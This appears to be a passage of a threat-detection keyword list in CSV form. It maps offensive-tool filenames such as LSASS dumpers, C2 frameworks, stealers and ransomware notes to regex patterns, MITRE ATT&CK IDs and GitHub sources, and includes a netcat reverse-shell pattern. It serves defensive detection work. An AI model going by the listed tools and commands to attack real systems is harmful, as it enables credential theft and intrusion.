"*\MutationGate.vcxproj*",".{0,1000}\\MutationGate\.vcxproj.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","N/A","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","16713" "*\mystikal.py*",".{0,1000}\\mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","0","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","16716" "*\NamedPipeClient.exe*",".{0,1000}\\NamedPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","16719" "*\NamedPipeClient.exe*",".{0,1000}\\NamedPipeClient\.exe.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","16720" "*\NamedPipeEventDatabase.cpp*",".{0,1000}\\NamedPipeEventDatabase\.cpp.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16721" "*\NamedPipeMaster.sln*",".{0,1000}\\NamedPipeMaster\.sln.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16722" "*\NamedPipeMasterBase\*",".{0,1000}\\NamedPipeMasterBase\\.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16723" "*\NamedPipeMaster-main*",".{0,1000}\\NamedPipeMaster\-main.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","16724" "*\NamelessC2.*",".{0,1000}\\NamelessC2\..{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","16725" 
"*\NamelessLog.txt*",".{0,1000}\\NamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","16726" "*\nanodump*",".{0,1000}\\nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","16727" "*\nanodump.c*",".{0,1000}\\nanodump\.c.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privileged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","16728" "*\nanodump.py*",".{0,1000}\\nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16729" "*\nanorobeus-main.zip*",".{0,1000}\\nanorobeus\-main\.zip.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16730" "*\NativeBypassCredGuard.sln*",".{0,1000}\\NativeBypassCredGuard\.sln.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16731" "*\NativeBypassCredGuard_C++*",".{0,1000}\\NativeBypassCredGuard_C\+\+.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16732" "*\NativeBypassCredGuard-main*",".{0,1000}\\NativeBypassCredGuard\-main.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","16733" "*\NativeDump.csproj*",".{0,1000}\\NativeDump\.csproj.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16734" "*\NativeDump.exe*",".{0,1000}\\NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without 
MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16735" "*\NativeDump.sln*",".{0,1000}\\NativeDump\.sln.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16736" "*\NativeDump\Program.cs*",".{0,1000}\\NativeDump\\Program\.cs.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","16737" "*\navicatpwd.exe*",".{0,1000}\\navicatpwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16738" "*\nbnsspoof.py*",".{0,1000}\\nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - 
T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16739" "*\nbtscan.py*",".{0,1000}\\nbtscan\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","16740" "*\nc.exe * -e sh*",".{0,1000}\\nc\.exe\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","16741" "*\nc_srv.bat",".{0,1000}\\nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","16744" "*\ndroRat Binder.exe*",".{0,1000}\\ndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT 
collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16753" "*\Necro-Stealer-*.zip*",".{0,1000}\\Necro\-Stealer\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","16754" "*\nemty_v1.txt*",".{0,1000}\\nemty_v1\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16755" "*\nemty_v16.txt*",".{0,1000}\\nemty_v16\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16756" "*\nemty_v25.txt*",".{0,1000}\\nemty_v25\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16757" "*\net*\ftpagent.exe*",".{0,1000}\\net.{0,1000}\\ftpagent\.exe.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command 
and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","0","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","16758" "*\net_4.0_32_RunasCs.exe*",".{0,1000}\\net_4\.0_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16763" "*\net_4.0_32SharpDoor.exe*",".{0,1000}\\net_4\.0_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16764" "*\net_4.0_32sharpfiles.exe*",".{0,1000}\\net_4\.0_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16765" "*\net_4.0_64_RunasCs.exe*",".{0,1000}\\net_4\.0_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16766" "*\net_4.0_64SharpDoor.exe*",".{0,1000}\\net_4\.0_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16767" "*\net_4.0_64sharpfiles.exe*",".{0,1000}\\net_4\.0_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16768" "*\net_4.0_Any_RunasCs.exe*",".{0,1000}\\net_4\.0_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16769" "*\net_4.0_AnySharpDoor.exe*",".{0,1000}\\net_4\.0_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16770" "*\net_4.0_Anysharpfiles.exe*",".{0,1000}\\net_4\.0_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16771" "*\net_4.5_32_RunasCs.exe*",".{0,1000}\\net_4\.5_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16772" "*\net_4.5_32SharpDoor.exe*",".{0,1000}\\net_4\.5_32SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16773" "*\net_4.5_32sharpfiles.exe*",".{0,1000}\\net_4\.5_32sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16774" "*\net_4.5_64_RunasCs.exe*",".{0,1000}\\net_4\.5_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16775" "*\net_4.5_64SharpDoor.exe*",".{0,1000}\\net_4\.5_64SharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16776" "*\net_4.5_64sharpfiles.exe*",".{0,1000}\\net_4\.5_64sharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16777" "*\net_4.5_Any_RunasCs.exe*",".{0,1000}\\net_4\.5_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16778" "*\net_4.5_AnySharpDoor.exe*",".{0,1000}\\net_4\.5_AnySharpDoor\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16779" "*\net_4.5_Anysharpfiles.exe*",".{0,1000}\\net_4\.5_Anysharpfiles\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
